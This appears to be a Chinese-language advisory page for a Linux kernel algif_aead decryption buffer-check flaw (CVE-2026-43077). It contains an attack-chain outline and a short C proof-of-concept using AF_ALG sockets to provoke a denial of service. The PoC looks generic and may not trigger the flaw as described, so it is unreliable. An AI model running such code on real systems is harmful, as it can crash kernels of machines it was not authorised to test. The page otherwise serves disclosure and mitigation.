CVE-2026-43077 CVSS 5.5 中危

CVE-2026-43077: Linux内核algif_aead解密缓冲区检查漏洞

披露日期: 2026-05-06

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-43077

漏洞类型

缓冲区边界检查错误

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核中的algif_aead组件存在安全漏洞，解密时接收缓冲区最小大小检查未包含标签长度，可能导致内存越界访问，本地攻击者可利用此漏洞造成拒绝服务。

技术细节

该漏洞源于Linux内核crypto子系统中algif_aead模块的实现缺陷。AEAD（带关联数据的认证加密）算法在解密数据时，需要同时处理密文和认证标签。受影响的代码在检查接收缓冲区大小时，仅验证了密文数据所需的长度，而遗漏了认证标签的大小。当本地低权限用户通过AF_ALG接口发送特制数据包时，若缓冲区大小不足，内核在尝试读取或写入标签数据时会发生越界访问。根据CVSS向量分析，此漏洞主要影响系统的可用性，可能导致内核崩溃或系统不稳定。

攻击链分析

STEP 1

获取访问权限

攻击者获得本地系统的低权限用户访问权限。

STEP 2

识别漏洞

确认目标Linux内核版本存在algif_aead模块的RX大小检查缺陷。

STEP 3

构造恶意数据

编写程序利用AF_ALG接口，构造不包含认证标签空间的小型缓冲区请求。

STEP 4

触发漏洞

执行恶意程序，触发内核在解密过程中的缓冲区越界检查。

STEP 5

达成影响

导致内核崩溃或系统拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * PoC for CVE-2026-43077
 * This code demonstrates interaction with algif_aead to trigger the size check logic.
 */
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/if_alg.h>

#define SOL_ALG 278

int main() {
    int tfm, op;
    struct sockaddr_alg sa = {
        .salg_family = AF_ALG,
        .salg_type = "aead",
        .salg_name = "gcm(aes)"
    };
    char buf[32] = {0};
    struct iovec iov = { .iov_base = buf, .iov_len = sizeof(buf) };
    struct msghdr msg = { .msg_iov = &iov, .msg_iovlen = 1 };

    tfm = socket(AF_ALG, SOCK_SEQPACKET, 0);
    bind(tfm, (struct sockaddr *)&sa, sizeof(sa));
    setsockopt(tfm, SOL_ALG, ALG_SET_KEY, buf, 16);
    op = accept(tfm, NULL, 0);

    // Attempt to send/recv with potential size mismatch
    sendmsg(op, &msg, 0);
    recvmsg(op, &msg, 0);

    close(op);
    close(tfm);
    return 0;
}

影响范围

Linux Kernel (Stable branches before specific commits)

Linux Kernel (Mainline before fix)

防御指南

临时缓解措施

建议尽快更新操作系统内核以修复此漏洞。若暂时无法更新，可限制本地用户权限或禁用相关的AEAD加密接口功能，以降低被利用的风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表